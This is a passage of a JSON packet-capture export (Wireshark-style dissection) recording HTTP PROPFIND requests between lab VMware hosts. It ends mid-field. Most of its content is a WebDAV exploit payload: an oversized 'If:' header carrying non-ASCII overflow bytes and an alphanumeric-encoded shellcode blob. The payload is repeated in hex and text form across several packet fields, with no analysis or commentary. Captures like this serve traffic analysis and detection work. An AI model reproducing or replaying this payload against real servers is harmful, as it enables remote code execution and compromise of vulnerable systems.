"tcp.payload": "4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "565",
|
||
"tcp.segment": "566",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1645",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:45:4e:55:56:61:56:4b:57:79:79:54:6e:46:64:47:64:70:56:46:56:79:77:6e:78:42:74:57:63:73:4c:73:46:57:67:6c:44:4a:78:44:7a:71:69:6e:4e:49:66:42:6b:4d:53:79:67:4b:64:61:65:52:4e:57:72:6a:49:51:75:4b:59:42:e4:a9:81:e7:91:a8:e6:9d:b6:e4:b1:89:e7:a1:a1:e5:a9:b6:e4:9d:86:e4:b9:ba:e5:99:92:e6:b5:93:e4:a9:81:e4:b5:ab:e4:99:af:e7:85:8e:e5:85:8c:e4:b9:aa:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:a9:a2:e7:99:8d:e4:89:a7:e5:81:b9:e6:89:b9:e5:a1:94:e6:b5:b3:e6:89:92:e7:81:a9:e6:91:a7:e6:89:b4:e4:a9:98:e5:99:86:e4:a1:85:e6:bd:94:e6:89:81:e5:a1:aa:e6:91:8e:e7:a9:ab:e7:a1:90:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:6c:74:49:4e:54:62:75:56:53:78:4e:6c:75:72:77:59:61:63:42:52:59:64:69:65:42:4b:52:61:69:54:65:74:6b:63:47:75:69:44:56:6e:54:67:73:4d:52:70:7a:55:76:59:42:78:62:74:6e:52:6d:58:67:73:41:74:65:58:47:68:4a:e4:a5:87:e4:9d:b8:e7:85:b4:e6:8d:87:e4:b5:a3:e7:81:b1:e6:95:98:e7:91:ab:e7:a5:92:e4:b5:8a:e5:89:99:e7:99:8b:e4:ad:a9:e7:91:af:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:a9:b4:e7:91:a1:e6:ad:b7:e5:89:a1:e1:8f:80:e6:a0:83:e7:95:96:e6:ad:93:e7:99:96:e4:95:9a:e4:91:a2:e6:99:ac:e4:b5:ac:e7:85:94:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/ENUVaVKWyyTnFdGdpVFVywnxBtWcsLsFWglDJxDzqinNIfBkMSygKdaeRNWrjIQuKYB<59><42><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/ltINTbuVSxNlurwYacBRYdieBKRaiTetkcGuiDVnTgsMRpzUvYBxbtnRmXgsAteXGhJ<68><4A><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "568"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.899583000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.899583000",
|
||
"frame.time_delta": "0.000006000",
|
||
"frame.time_delta_displayed": "0.003511000",
|
||
"frame.time_relative": "17.150523000",
|
||
"frame.number": "576",
|
||
"frame.len": "261",
|
||
"frame.cap_len": "261",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "247",
|
||
"ip.id": "0x0000b50f",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00007b8a",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "40465",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "40465",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "80",
|
||
"tcp.len": "195",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "1400471818",
|
||
"tcp.nxtseq": "1644",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "2108708873",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00006eeb",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:a3:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:a3:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868707",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000249000",
|
||
"tcp.analysis.bytes_in_flight": "1643",
|
||
"tcp.analysis.push_bytes_sent": "1643"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000595000",
|
||
"tcp.time_delta": "0.000006000"
|
||
},
|
||
"tcp.payload": "34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "575",
|
||
"tcp.segment": "576",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1643",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:73:6c:75:76:6a:77:4d:4e:63:59:58:62:48:6b:4a:66:4e:46:6a:4a:7a:74:48:44:48:46:63:50:62:6e:64:6f:6e:41:6a:72:4c:4b:4c:51:76:67:71:4f:43:47:67:65:4a:53:68:4a:77:6a:6b:44:42:72:6b:78:6f:71:58:45:6e:57:e7:a5:87:e5:a1:ac:e5:8d:b7:e4:95:a2:e6:a1:ba:e4:a1:ae:e6:85:81:e7:a5:b6:e4:a5:94:e4:bd:a5:e4:9d:b8:e5:85:84:e6:b9:a5:e5:91:ae:e6:9d:a7:e6:bd:97:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:95:84:e4:ad:8d:e6:99:94:e4:b1:90:e5:a5:8d:e5:91:99:e4:8d:b5:e6:ad:b6:e4:b1:8b:e6:95:87:e6:95:93:e7:95:a8:e5:81:a4:e4:99:94:e5:8d:8d:e6:89:9a:e4:a9:a7:e5:a9:a7:e5:89:85:e4:bd:9a:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:74:62:6f:75:70:4a:66:74:4b:56:42:70:55:47:45:74:73:52:4f:62:57:42:64:48:6a:50:4e:64:43:58:79:4e:58:72:70:44:48:75:78:48:49:55:61:4d:64:77:54:7a:46:54:50:63:6a:4f:76:48:78:4f:69:57:70:66:55:4f:48:43:e6:b9:88:e6:91:ae:e5:a5:81:e6:91:93:e5:9d:89:e4:85:84:e7:91:af:e7:8d:b6:e7:8d:99:e7:a1:85:e7:a9:97:e4:a5:b5:e7:95:8f:e4:8d:ba:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e6:ad:8e:e7:9d:8e:e7:9d:87:e4:ad:8e:e1:8f:80:e6:a0:83:e4:b9:89:e4:a5:b1:e6:95:a7:e6:ad:83:e6:bd:9a:e5:9d:81:e6:9d:a2:e4:ad:b2:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49: